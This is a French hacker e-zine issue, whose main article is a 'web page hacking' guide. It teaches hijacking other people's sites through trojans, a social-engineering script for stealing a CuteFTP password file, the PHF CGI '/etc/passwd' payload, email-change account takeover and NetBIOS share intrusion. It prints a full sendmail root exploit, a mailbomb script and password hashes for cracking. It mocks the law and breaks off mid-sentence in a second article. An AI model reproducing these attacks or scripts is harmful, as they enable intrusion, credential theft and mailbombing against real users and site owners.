ATTENTION: Ce produit,si exposer longtemps aux yeux, peu provoquer des
irratations de facon importante, soyez toujours prudent.
Pour conclure: La yé 5h30 du matin, j'ai un cours "d'éducation physique"
dans 1h30, pis chu ben saoul et cela sans avoir dormi de la nuit. Bizzare
c'est quand je suis saoul que j'ai des idées pour mes articles.
La yé rendu 10h am de la meme journer, pis je me suis fais crisser dehors de
mon cours pour l'anner, spa grave c'étais poche.
Le texte que vous venez de lire, est une version corriger de l'original, si
je l'aurais pas fait, vous auriez rien compris. Amuser vous bien.
____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #1
:
| Un numero a essayer au Quebec sans vraiment une utilitée
| 320-0048
|
'.________ __ __ ___________ ____ ______________ ____ ___ ______ __ __
- -ÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ-- - ú
³ +:par endrix:+ ³
³ú - -ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ú - -ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ __ __ _ ____ ³
³ \ \ / /__| |__ | _ \ __ _ __ _ ___ ³
³ \ \ /\ / / _ \ '_ \| |_) / _` |/ _` |/ _ \ ³
³ \ V V / __/ |_) | __/ (_| | (_| | __/ ³
³ \_/\_/ \___|_.__/|_| \__,_|\__, |\___| ³
³ |___/ ³
³ _ _ _ _ ³
³ | | | | __ _ ___| | _(_)_ __ __ _ ³
³ | |_| |/ _` |/ __| |/ / | '_ \ / _` | ³
³ | _ | (_| | (__| <| | | | | (_| | ³
³ |_| |_|\__,_|\___|_|\_\_|_| |_|\__, | ³
³ |___/ ³
³ ³
³ ³
ú - --ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅ--
__________________________________________________________________
/ _____________________________________<-www.endrix.net->__________\
||Site Web : Http://endrix.cjb.net ||____¯_¯_¯_¯_¯_¯_¯_¯____________\
||Contact : lordendrix@hotmail.com ||______________________________||
||mIRC : #pirate, #grc, #hack.fr, #phreak.fr, #outaouais, #n0past ||
\ ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ /
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
============================================================
=========================par endrix=========================
============================================================
== ==
== ==
== The ultime guide to simple ==
== web page hacking ==
== ==
== Greeds to : ==
== ¯¯¯¯¯¯¯¯¯¯¯ ==
== _________ __________ __________ ==
== -[ _Franck ]- + -[ silicone ]- + -[ ASHMEU ]- ==
== -[ _SnoOp_ ]- + -[ B|aster ]- + -[ B3rT|9 ]- ==
== -[ B3rT|9 ]- + -[ H ]- + -[ surge-16 ]- ==
== ¯¯¯¯¯¯¯¯¯ ¯¯¯¯¯¯¯¯¯¯ ¯¯¯¯¯¯¯¯¯¯ ==
== ==
============================================================
============================================================
============================================================
O==============O
<| Introduction |>
O==============O
Hey bien, voici a une édition par moi, endrix, sur le web page hacking.
Après avoir lu ce texte, vous devriez être capable de modifier une page
selon vous le désirez mais certaines conditions s'appliquent. Je n'ai
pas écrit ca pour que tout le monde commence a hacker tout le monde.
C'est juste pour vous montrez que vous pouvez faire que chose cool avec
peu de connaissance dans le piratage car ceci va vous permettre un hacker
une page web avec presque pas de commaissance. Pour me rejoindre, vous
pouvez m'envoyer un email à lordendrix@hotmail.com ou sur mIRC, sur les
channels suivants : #outaouais, #warezfrancais, #hack.fr, #haqch, #grc,
#pirate et #visualbasic. Je vous conseille fortement d'aller visiter mon
site web à l'addresse suivante : Http://endrix.cjb.net. Si vous possédez
un domaine(.com, .net ou .org) et le serveur est sur un T1 minimum et vous
voullez me hoster, hey bien contacter moi le plus vite possible !!!
Have fun !!!
O=================O
<| Matière de base |>
O=================O
Premièrement, il faut savoir quelque matière de base avant faire tout ca.
"je veux hacker mais je ne sais pas comment utiliser un ftp" --> ichhhh !!
Je recois souvent un message de ce genre. Ici, je vais vous apprendre comment
utiliser un ftp, mais si vous êtez un internet wizzard, skipper cette section
au plus sacran !!! Bon, pour mettre un site sur l'internet, il faut un serveur
qui est connecté 24h sur 24h sur l'internet et qui offre un service de web
hosting comme :
- Geocities => Http://www.geocities.com
- Multimania => Http://www.multimania.com
- Fortunecity => Http://www.fortunecity.com
- ml services => Http://www.ml.org
- Xoom.com => Http://www.xoom.com
- Angelfire => Http://www.angelfire.com
- Altern => Http://www.altern.org
- come => Http://www.come.to
- et bien d'autres....
Ces serveurs offres un service de web hosting gratuit qui permet et personne
comme vous et moi de ce faire un super site web et attirer plein de gens du
monde entier !! Après que votre page web est fait(index.html) il faut
l'uploader(*) sur le serveur.
* = Uploader c'est envoyez un fichier de votre ordinateur.
downloader c'est aller chercher un fichier d'un ordinateur au votre.
il y a 2 moyens de faire ca : WWW upload(d'un site web) et FTP.
C'est pas tout les serveurs qui offrent le www upload mais un comme geocities
l'offre. Je vous conseille malgré cela, de toujours le faire par FTP. il y a
plusieurs ftp sur le marché du web mais je vous suggère d'utiliser le plus
connu : CuteFTP. Il est facile a utiliser et très complet. Allez le cherchez
à http://www.tucows.com et pour l'enregistrer, emailer moi... Donc, une fois
installé cuteftp, connectez-vous a votre serveur. Si vous êtes a xoom, dans
le host marquez : ftp.xoom.com, votre nom d'usager et le mot de passe.
Une fois connecté, vous pouvez envoyer tout vos fichiers sur le net sans
difficulté.
Maintenant, vous savez comment utiliser un FTP. Pour hacker un site web, il
vous faut le nom de l'host, le nom de l'utilisateur et le mot de passe. Le seul
qui est dur a obtenir est le mot de passe(password). Pour avoir le host,
si la page est www.xoom.com/z3r0c00l/index.html, le host est xoom.com et le
username est z3r0c00l mais comment le host si c'est... worldhacking.com ??!?!
Pour faire ca, il vous faut ouvrir votre mode ms-dos.
Démarrer, Exécuter et écrire "command" et clicker sur "Enter". Une fenêtre va
apparaitre(MS-DOS) :
------
Microsoft(R) Windows 98
(C)Copyright Microsoft Corp 1981-1998.
C:\WIN98\Bureau>
------
Il faut être dans le c:\win98>. Alors tapez c:\win98\bureau>cd..
------
c:\win98>
------
La, il fait ouvrir un programme qui l'appelle Telnet. Ce programme est utilisez
pour faire plusieur choses.. chatter, vérifiez ces emails, uploader sont site web,
.... Faites ca :
------
c:\win98>telnet whois.internic.net 23
------ ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
ceci va ouvrir le programme Telnet et va marquer ca(c'est normal que parfois
ca prenne quelque temps..) :
------
UNIX(r) System V Release 4.0 (rrs4)
***************************************************************************
* -- InterNIC Registration Services Center --
*
* For the *original* whois type: WHOIS [search string] <return>
* For referral whois type: RWHOIS [search string] <return>
*
* For user assistance call (703) 742-4777
# Questions/Updates on the whois database to HOSTMASTER@internic.net
* Please report system problems to ACTION@internic.net
***************************************************************************
The InterNIC Registration Services database contains ONLY
non-military and non-US Government Domains and contacts.
Other associated whois servers:
American Registry for Internet Numbers - whois.arin.net
European IP Address Allocations - whois.ripe.net
Asia Pacific IP Address Allocations - whois.apnic.net
US Military - whois.nic.mil
US Government - whois.nic.gov
Cmdinter Ver 1.3 Mon Jan 18 23:22:59 1999 EST
[dec-vt100] InterNIC >
-------
what tha ???? La, vous êtes conencté a un serveur whois.internic.net qui vous
permets d'obtenir de l'information sur n'importe koi .. faites ceci :
-----
[dec-vt100] InterNIC >whois worldhacking.com
-----
et ca va donner quelque chose comme ca :
-----
Registrant:
alexmax gaublay (WORLDHACKING-DOM)
154 rue des champselyses
chicoutimi, NA g7h3g3
CA
Domain Name: WORLDHACKING.COM
Domain Status: On Hold
Administrative Contact:
albert, fredo (FA1544) pennyboy@MYGALE.ORG
545-2426 (FAX) 645-3532
Technical Contact, Zone Contact:
Lacambre, Valentin (VL15) root@ALTERN.COM
33 1 40264666
Billing Contact:
albert, fredo (FA1544) pennyboy@MYGALE.ORG
545-2426 (FAX) 645-3532
Record last updated on 12-Jan-99.
Record created on 21-Oct-98.
Database last updated on 16-Jan-99 04:09:41 EST.
Domain servers in listed order:
NS1.MERDRE.NET 209.66.99.99
NS2.MERDRE.NET 209.207.174.20
Whois:
-----
d'après ce qu'a donné ca, le domain worldhacking.com est hosté par le serveur
MERDRE.NET, merdre.net est un domaine de altern.org. Donc, voila qu'on connait
le host de worldhacking.com qui est ftp.altern.org !!! et le username qui est
worldhacking bien sur !!! Mais maintenant, comment trouver le password ???
heehe le fameux fichier que tout le monde aimerais avoir !!! Et bien, j'ai trouvé
plusieurs moyen de se procurer ce fichier :
- par un trojan
- S.E.
- www password cracker
- PHF
- Changement d'email
- Partage de fichier
- Exploit de linux par un trou de sécurité
======================
= Les fichiers PWL =
======================
Quand vous allez cracker des fichiers mot de passe, il vous faut les connaitre. Un fichier
mot de passe est normalement comme ceci :
Administrator:500:7584248B8D2C9F9EAAD3B435B51404EE:186CB09181E2C2ECAAC768C47C729904
Ceci est un fichier password d'un administrateur de domaine. Tout les chiffres que vous voyez,
sont le password encrypté. Pour le décrypter, il faut un programme. Le meilleur que je connaisse
est John the Ripper et/ou LOphtCrack. Ces programmes sont ultra rapide pour faire ce genre de
chose pour cracker, il faut un password et une word list... Une word list a l'air de quelque chose
comme ca :
0
1
7
123
246
249
369
777
911
1022
1225
1234
1313
1928
1951
2112
2222
4444
5252
5555
5683
6969
7007
7777
12345
13579
14430
54321
80486
90210
92072
111111
121212
123123
123456
131313
654321
666666
696969
888888
1234567
8675309
12345678
21122112
99999999
!@#$%
!@#$%^
!@#$%^&
!@#$%^&*
*
@#$%^&
_
10sne1
1234qwer
123abc
123go
1701d
1a2b3c
1p2o3i
1q2w3e
1qw23e
1sanjose
2welcome
4runner
a
A&M
A&P
a12345
a1b2c3
a1b2c3d4
AAA
aaa
aaaaaa
Aaaaaa
AAAS
aardvark
Aarhus
Aaron
aaron
AAU
ABA
Ababa
aback
abacus
abalone
abandon
abase
abash
abate
abater
abbas
abbe
abbey
abbot
Abbott
abbreviate
abby
abc
abc
abc123
ABC123
abcd
abcd1234
abcde
Abcdef
abcdef
Abcdefg
abcdefg
abdicate
abdomen
abdominal
abduct
Abe
abed
Abel
Abelian
Abelson
Aberdeen
Abernathy
aberrant
aberrate
abet
abetted
abetting
abeyance
abeyant
abhor
abhorred
abhorrent
abide
Abidjan
Abigail
abigail
abject
abjure
ablate
ablaze
able
ablution
abnegation
Abner
abnormal
Abo
aboard
abode
abolish
abolition
abominable
abominate
aboriginal
aborigine
aborning
abort
abound
about
above
aboveboard
aboveground
abovementioned
abrade
Abraham
Abram
Abramson
abrasion
abrasive
abreact
abreast
abridge
abridgment
abroad
abrogate
abrupt
abscess
abscissa
abscissae
abscond
absence
absent
absentee
absenteeism
absentia
absentminded
absinthe
absolut
absolute
absolution
absolve
absorb
absorbent
absorption
absorptive
abstain
abstention
abstinent
abstract
abstracter
abstractor
abstruse
absurd
absurdum
abuilding
abundant
abusable
abuse
abusive
abut
abutted
abutting
abysmal
abyss
Abyssinia
AC
acacia
academe
academia
academic
academician
academy
Acadia
acanthus
Acapulco
accede
accelerate
accelerometer
accent
accentual
Voici une minuscule word list. Essayez de cracker celui-ci. Vous devriez trouver le password
"A" pour l'administrateur. En voici d'autre pour vous :
foura:1002:DCF9CAA6DBC2F2DFAAD3B435B51404EE:FA5664875FFADF0AF61ABF9B097FA46F:::
fivea:1003:A80F6E6A87BA6AC2AAD3B435B51404EE:75C06256F58D07A18B239E4CC39A382D:::
sixa:1004:A9C604D244C4E99DAAD3B435B51404EE:ACB98FD0478427CD18949050C5E87B47:::
sevena:1005:CBC501A4D2227783AAD3B435B51404EE:20C3AE5D1C643871B2CA618C2512CC46:::
eighta:1006:CBC501A4D22277837584248B8D2C9F9E:291E34A0D1EEB75F9ECB0880B469BE23:::
onez:1007:1D91A081D4B37861AAD3B435B51404EE:0366F5C43990657D4AF37BC470E0EF97:::
twoz:1008:E1C862B468D1C6D6AAD3B435B51404EE:A2EBDCC6F325AB2B343020497301F66C:::
threez:1009:CF78D4607D48813AAAD3B435B51404EE:CC12D60632E2BEBE925F20970B6C1EE8:::
fourz:1010:CE045FF77F9D89E2AAD3B435B51404EE:5029F63209F0A33B7BAACF85F1984DB3:::
fivez:1011:9A0A242740E1E245AAD3B435B51404EE:974EEB9F2ED704D87E8EB392EEA688ED:::
sixz:1012:1FB363FEB834C12DAAD3B435B51404EE:FCE5DF542D589B2B55E2A8EA8290C8B6:::
sevenz:1013:A5E6066DE61C3E35AAD3B435B51404EE:BFA802E2F36CDF2B776B7A85FD5ED863:::
eightz:1014:A5E6066DE61C3E351D91A081D4B37861:F05C1449BA2575D9764EC7F9DE4F8040:::
ninez:1015:A5E6066DE61C3E35E1C862B468D1C6D6:F08E2A5987D4692D9A8B32CF409DB874:::
onem:1016:1486235A2333E4D2AAD3B435B51404EE:7E864D8195B263B4D6AEE4E041C0193F:::
twom:1017:FBF69FCD34281A77AAD3B435B51404EE:094930B371F21E4A8379CC6ACF23B05E:::
threem:1018:8F3E3862EBBCCC49AAD3B435B51404EE:C1E809475B2D41C4EA883A249EE4D203:::
fourm:1019:4983AA449F48595CAAD3B435B51404EE:313FCB69CF31E3EDA1CA2C94B79B33A2:::
fivem:1020:D5C546473739D83AAAD3B435B51404EE:A918E0700CE78341A188774DD66DC7A4:::
sixm:1021:81A28589262A0004AAD3B435B51404EE:FF4EF4C1DD99FFC59D982E40522FF474:::
sevenm:1022:F6F2FA9986D540CFAAD3B435B51404EE:9FACF535A07FC4B778D9879B49EA004D:::
eightm:1023:F6F2FA9986D540CF1486235A2333E4D2:60B0D2BA29482C9AE3E07A4617176E51:::
ninem:1024:F6F2FA9986D540CFFBF69FCD34281A77:8B64AA9FDDE6B8C7F246E20845797545:::
Essayez de les crackers .... Pour les passwords, emailer moi et je vais vous dire
si c'est correct ou pas.
===================
= Par un Trojan =
===================
Pour faire ca, il vous faut, un IPscanner et un client de trojan, les suivants feront
l'affaire :
- Socket de Troie
- NetBUS
- DeepBO
- Hacker's paradise
- Portal of Doom
- Millenium
- N'importe quel trojan qui donne un access au disque dur.
PortScanner : Ce programme va servir à scanner un IP(xxx.xxx.xxx.1 à xxx.xxx.xxx.255)
et trouver des personnes qui sont infecté par un trojan.
Port : - 5000 (socket de troie)
- 31337 (BackOrifice)
- 31338 (DeepBO)
- 12345 (Netbus v1.6)
- 123456 (netbus v1.7)
Avec des trojans, il y a deux maniere que j'ai trouvé. Avec un trojan et permet de voir
les cached passwords(DeepBO) ou avec un qui donne accèss au HD(Disque dur). DeepBO est un
trojan, qui quand tu es connecté, il permet de te montrer les passwords que la personne
a dans sont registery(base de registre). il y a des serveurs comme geocities qui envoit
un cookie dans ton reg ou certains FTP font ca aussi... Et quand, avec deepbo, tu vas avoir
trouvé une personne qui est infecté et a une page web avec geocities... quand tu vas faire
voir les cached passwords, ca va te donner les passwords et les usernames ... tu peux aussi
infecté le web master d'un site web si tu veux en fesant du se .... Avec netbus ?!? Et bien,
cette maniere va marcher avec n'importe quel trojan qui permet d'avoir access au HD de
l'utilisateur du PC. Si la personne a CuteFTP, dans sont répertoire, il y a un fichier qui
se nomme smdata.dat Ce fichier contient les informations des ftp que la personne a mit dans
sont bookmark. Tu peux voir le user name, le host mais le password est encrypté. Voici la
clé de décryption pour CuteFTP :
a = © b = ª c = « d = ¬ e = f = ¾
g = ¯ h = i = ¡ j = ¢ k = £ l = ¤
m = ¥ n = ¦ o = § p = ¸ q = ¹ r = º
s = » t = ¼ u = ½ v = ¾ w = ¿ x = °
y = ± z = ²
ou bien, vous avez juste a télécharger le fichier smdata.dat et le remplacer par celui que
vous avez en ce moment dans cotre CuteFTP a vous. Maintenant, vous avez juste a ouvrir votre
cuteftp et vous connecté au ftp du mec et modifier ca page web a votre guise ...
=======================
= Social Eingineering =
=======================
Le Social Eingineering est une facon de convaincre la personne, le web master, le mec qui
travaille la.... de vous faire confiance et de vous donnez des informations très importante
qui vons vous permettre d'accomplir votre but avec succès !! Si vous voullez le fichier
smdata.dat vous avez juste a faire un petit scénario comme celui-ci :
<vous> Hey man ca va ???
<victime> ouaip pi toi ?
<vous> pas mal merci ......
<vous> euhhmm.. j'ai grandement besoin d'aide ...
<vous> as-tu CuteFTP ???
<victime> oui pourquoi ????
<vous> il faut que j'update mon site au plustot mais ma soeur ou mon pere ont du touché a
l'ordinateur, car quand j'ouvre mon cuteftp ca marque qu'il manque un fichier .. meneute
m'a aller voir c'est koi encore ....
<victime> ok ...
<vous> c'est le fichier "smdata.dat" ....
<vous> tu dois l'avoir ????
<victime> euuuuuuu... oui je crois ... si oui, je vais te l'envoyez ...
DCC send = smdata.dat
<vous> si tu étais a côté de moi, je te donnerait un gros bec !!!
<vous> merci, merci beaucoup !!!
<victime> np
<vous> tiens, t'ira voir mon travail dans 20 minutes à : http://www.domaine.com
<vous> merci encore, je dois y aller !!
<victime> ok bye !!
heehe ceci est une technique de SE. Vous aussi enfaire un pour envoyer un virus a un
mec et faire accroire que c'est un super programme .... Je vous laisse avec votre imagination
sur ce point ...
========================
= www password cracker =
========================
un WWW password cracker, est un programme, qui avec une bonne word list(*), trouve le mot de
passe.
* word list : Une word list, est un fichier texte qui contient que des mots ....
Ce que le programme fait : Il se connecte sur le FTP du mec, avec le username et le host et
essaye de ce connecter avec chaque mot qu'il y a dans le word list comme password. Je sais,
ca peut être très long car, il y a des word lists, et contiennent comme 10000 mots... mais
il s'agit de trouvé une bonne word list et ca risque de marcher a tout coup !!! Voici quelque
programme qui font ca :
- Unsecure
- WebCrack
- WWWHack (pour les pass en HTML)
- Nessus
- VcrackFTP
====================
= Technique du PHF =
====================
Bien cette technique, a été il y a très longtemp découvert mais il y a encore 5% des serveurs
qui n'on pas changer leurs programmes et qui sont vulnérable. Cette maniere, est une des plus
faciles qu'il y a !!! Encore plus facile qu'avec les trojans. Pour obtenir le fichier password,
il s'agit de faire ca :
Http://www.domaine.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
et voila !! c'est tout !!! Vous n'avez qu'a remplacer le domaine.com par le site que
vous voullez hacké.
======================
= Changement d'email =
======================
Dans tout les serveurs qui offrent du web hosting gratuit, pour vous inscrire, vous devez
entrer vos coordonées, le nom d'utilisateur et le mot de passe. Pour activer votre compte,
il faut aller voir vos emails et avec votre password, activé le compte. Donc, pour commencer
il vous faut avoir un email qui est presque pareille que le web master du site. Après, allez
sur le site de votre web hosting, aller dans aide et faitez un changement d'adresse email.
Quand ceci va être fais, demander pour vous envoyez le mot de passe a votre nouveau car, vous
l'avez perdu et, blah, blah, blah ... Quand vous allez checker vos emails, vous allez voir
un message du servuer vous donnant le mot de passe du site ! :))))
======================
= Partage de fichier =
======================
Hey bien, quand vous allez chez vos amis(es) avec votre ordinateur, et vous vous mettez en
réseaux, vous jouez a des jeux comme, Starcraft, Quake, Doom, Duke 3D, Blood.... Mais après
quand vous avez finnit, vous allez mettre le HD de votre ami en partage de fichier(qui te
donne accèss au HD de ton chu) et tu vas chercher des fichiers cool, des jeux, ou meme des
logs de mIRC ... Après avoir fait tout ca, vous partez, mais doooooohh !!! Tu as oublier
de copier des fichiers...GRRRrrrrrrr !!!! Tu peux pas lui demander parce que tu n'es pas
supposé avec ces fichiers... alors quand il va être sur le Net, tu vas le voir tu dit
salut, blah, blah ... Tu prends sont IP(/dns nick). Premièrement, il faut vérifier s'il
l'a auté.. comment !!!!???? Ouvrez une fenêtre dos(Démarrer, Executé tappez command et
peser sur enter).
--------
Microsoft(R) Windows 98
(C)Copyright Microsoft Corp 1981-1998.
C:\WIN98\Bureau>
--------
bon, allez dans votre répertoire de windows, c:\win98\bureau>cd..
c:\win98>
La, on va utiliser une commande qui permet de voir si la personne est encore en partage
de fichier...
--------
c:\win98>nbtstat -A IP
NetBIOS Remote Machine Name Table
Name Type Status
-----------------------------------------------------
UNSERNAME <00> UNIQUE Registered
WORKGROUP <00> GROUP Registered
USERNAME <03> UNIQUE Registered
USERNAME <20> UNIQUE Registered
WORKGROUP <1E> GROUP Registered
MAC Address = 44-45-53-54-00-00
c:\win98>
--------
Si vous voyez ca, ca veux dire que ton ami est encore en partage de fichier.
Avant de l'appeller pour lui dire, il faut que tu ailles chercher tes fichiers....
S'il n'est pas en partage de fichier, vous verez un message d'erreur. Dans le fond,
ce qui nous interresse, c'est le <20>, qui est le service de partage. S'il n'est
pas la, vous ne pourrez jamais, au grand jamais, vous connecter à cet ordinateur.
La, il faut que vous tappiez la commande suivante :
--------
c:\win98>echo IP_du_remote_20 > c:\win98\lmhosts
--------
Ceci va crée le fichier lmhosts avec tout les choses dedant pour faire fonctionner
le hack. Si le lmhosts n'est pas la, ou est mal écrit, rien de vais marcher. Et
voila, il ne vous reste qu'à rester le cache du netbios en tappant la command suivante :
-------
c:\win98>nbtstat -R
Successful purge and preload of the NBT Remote Cache Name Table.
c:\win98>
-------
Maintenant, pour voir les drives qui sont en partage, vous pouvez faire ceci :
-------
c:\win98>net view \\nom_remote_20
Shared resources at \\USERNAME
Sharename Type Comment
-----------------------------------------------
A Disk
C Disk
D Disk
The command was completed successfully
c:\win98>
-------
Bon, apres avoir fait ca, vous pouvez voir quel drives vous avez accèss. D'apres celui-ci,
le A, le C, le D sont en partage donc, vour pouvez avoir accèss au A, C et D. Pour vous
connecter, faites ceci :
-------
c:\win98>net use * \nom_du_remote_20 le_drive
-------
Donc, si le nom_du_remote_20 est : endrix
et le drive est : c
Faites :
c:\win98>net use * \endrix c
Et bien la, vous êtes connecté sur l'ordinateur du mec. Maintenant vous pouvez
allez chercher vos fichiers et l'appeller pour lui dire de ne plus laissez sont
HD en partage.
=====================
= Exploit de Linux =
=====================
Hey bien pour cette section je ne vais que montrer un exploit très cunnu
qui a comme fonction de faire un bug dans le système et vous donnez le r00t
du Pc. Cet exploit de nomme :
SendMail v8.8.4
il crée un programme dans le /tmp/x qui donne le root apres ...
SendMail :
¯¯¯¯¯¯¯¯
cat <<_EOF_>/tmp/x.c
#define RUN "/bin/ksh"
#include<stdio.h>
main()
{
execl(RUN,RUN,NULL);
}
_EOF_
#
cat <<_EOF_>/tmp/spawnfish.c
main()
{
execl("/usr/lib/sendmail","/tmp/smtpd",0);
}
_EOF_
#
cat <<_EOF_>/tmp/smtpd.c
main()
{
setuid(0);setgid(0);
system("shown root /tmp/x ;chmod 4755 /tmp/x");
}
_EOF_
#
#
gcc -O3 -o /tmp/x /tmp/x.c
gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c
gcc -O3 -o /tmp/smtpd /tmp/smtpd.c
#
/tmp/spawnfish
kill -HUP '/usr/ucb/ps -ax|grep /tmp/smpd|grep -v grep|sed s/"[]*"//cut -d" "-fl'
rm /tmp/spawnfish.c /tmp/spawnfish /tmpsmtpd.c /tmp/smtpd /tmp/x.c
sleep 5
if [ -u /tmp/x ] ; then
echo "leet..."
/tmp/x
fi
En voici un autre :
#!/bin/bash
TMPDIR=/tmp/`whoami`
PLIK=$TMPDIR/.safe
TIMEOUT=2
LIMIT=10
MAX=20
echo
echo "SafeBomb 1.02b -- sendmail HELO hole usage example"
echo "Author: Michal Zalewski <lcamtuf@boss.staszic.waw.pl>"
echo
if [ "$4" = "" ]; then
echo "USAGE: $0 msgfile address server sender"
echo
echo " msgfile - file to send as a message body"
echo " address - address of lucky recipient"
echo " server - outgoing smtp server w/sendmail"
echo " sender - introduce yourself"
echo
echo "WARNING: For educational use ONLY. Mailbombing is illegal."
echo "Think twice BEFORE you use this program in any way. Also,"
echo "I've never said this program is 100% safe nor bug-free."
echo
sleep 1
exit 0
fi
if [ ! -f $1 ]; then
echo "Message file not found."
echo
exit 0
fi
echo -n "Preparing message..."
mkdir $TMPDIR &>/dev/null
chmod 700 $TMPDIR
echo "echo \"helo _safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__
safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb
__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__sa
febomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb
__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safe
bomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__
safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebo
mb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__sa
febomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb
_safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safeb
omb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__s
afebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebom
bb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__sa
febomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb
__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safe
bomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__
safebomb__safebomb__safebomb_\"" >$PLIK
echo "echo \"mail from: \\\"$4\\\"\"" >>$PLIK
echo "echo \"rcpt to: $2\"" >>$PLIK
echo "echo \"data\"" >>$PLIK
echo "cat <<__qniec__" >>$PLIK
cat $1 >>$PLIK
echo "__qniec__" >>$PLIK
echo "echo \".\"" >>$PLIK
echo "echo
\"quit\"" >>$PLIK
echo "sleep $TIMEOUT" >>$PLIK
chmod +x $PLIK
echo "OK"
echo "Sending $1 (as $4) to $2 via $3 -- Ctrl+Z to abort."
SENT=0
while [ -f $1 ]; do
$PLIK|telnet $3 25 &>/dev/null &
let SENT=SENT+1
echo -ne "Sent: $SENT\b\b\b\b\b\b\b\b\b\b\b\b\b"
CONNECTED=`ps|grep -c "telnet $3"`
if [ "$LIMIT" -le "$CONNECTED" ]; then
while [ "$LIMIT" -le "$CONNECTED" ]; do
sleep 1
done
fi
if [ "$SENT" -ge "$MAX" ]; then
echo "It's just an example, sorry."
echo
exit 0
fi
done
hey bien, je vous souhaite ben du fun les boys and girls avec
ces exploits !!!
O============O
<| conclusion |>
O============O
voila, c'est finnit !!!! Avec ca, vous allez
pouvoir vous faire ben du fun... N'oublier que
d'entrer sur un ordinateur qui n'est pas le notre
est un infraction a la loi(who gives a fuck...).
Faites vous pas pogner et si vous avez d'autre
maniere que je n'ai pas penssé, faites moi le
savoir !!!
____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #1
: #Quebec can't join channel (it's full) , un classique quoi.
| Plus maintenant grace a /timer 0 3 /join #quebec
| Une fois entrer sur le chan,tapper
| /timer1 off
| Pour ceux qui avaient pas pensé a ce truc
'.________ __ __ ___________ ____ ______________ ____ ___ ______ __ __
Qui sont-ils ?
Par [G]r4FX
Pirates.
Le terme de pirate englobe toutes les personnes qui enfreignent les lois de
l'informatique. Ces lois sont établies par chaque pays, cela pose un problème
car Internet est accessible à tous les habitants de la planète et certains
actes sont des infractions pour les uns mais pas obligatoirement pour les
autres. (Informatique et Liberté). Le pirate est une personne qui viole les
droits d'autrui ou des sociétés à son profit. Les pirates les plus communs
sont les hackers, les crackers et toute personne copiant du software pour son
utilisation personnelle ou pour la vente. Nous laisserons de côté la copie
de software, pour nous intéresser de plus près à ceux qui veulent prendre le
contrôle d'un système informatique alors qu'ils n'y sont pas autorisés.
Hackers.
Le hacker est une personne qui rentre dans un système informatique en sautant
les barrières de protection (Le roi des hackers), souvent par défi
intellectuel et pas toujours par profit matériel. Certains ne font que
visiter le système causant, malgré tout, la panique des services de sécurité.
D'autres hackers appelés parfois crackers sont beaucoup plus actifs; ils
pénètrent un système et en détériorent le software en le modifiant, en le
détruisant, en lui implantant un virus, etc. Un exemple simple de " cracking
" pourrait être celui de changer un lien (" link ") par une autre sans en
changer le nom. C'est à dire une personne qui voudrait rentrer pour
connaître les offres d'une banque serait renvoyée sur un autre site.
Les hackers sont-ils dangereux?
Outre le fait qu'une attaque de hackers peut endommager ou détruire votre
software, hackers ou crackers peuvent aussi violer l'intimité de n'importe
quel citoyen. Beaucoup de personnes ont dans leur ordinateur ou dans celui de
leur entreprise une grande partie de leur vie personnelle : accès aux comptes
en banque, courrier électronique qu'il soit personnel ou professionnel,
etc...Une attaque de hackers peut donc se traduire par une destruction de ces
données ou pire par une utilisation frauduleuse et à votre insu de celles-ci.
Comment procèdent-ils?
Certains pirates réussissent à rentrer dans un réseau en utilisant un code
d'entrée ( mot de passe ). Ils essaient, d'abord, de se renseigner sur le
nombre de caractères possibles dans le code. Ensuite, ils tentent, par
l'intermédiaire d'un programme de leur fabrication, tous les codes possibles
par rapport au nombre de caractères obtenus auparavant et ce jusqu'au
succès. Une autre méthode est la suivante: les pirates recherchent des
informations personnelles sur le propriétaire du système qu'ils veulent
visiter. Les statistiques démontrent que la plupart des personnes prennent
leurs données personnelles comme code d'entrée dans leur ordinateur. (nom de
leurs enfants, date de naissance, etc...). Alors, les hackers essayent
différentes combinaisons avec ces données. Il n'est bien entendu pas
possible de recenser toutes les méthodes, l'imagination des hackers est sans
bornes.
Exemples
De la Une du New York Times aux journaux télévisés diffusées aux heures de
grande écoute, tous les médias ont retenu du 3 novembre 1988 l'arrivée d'un
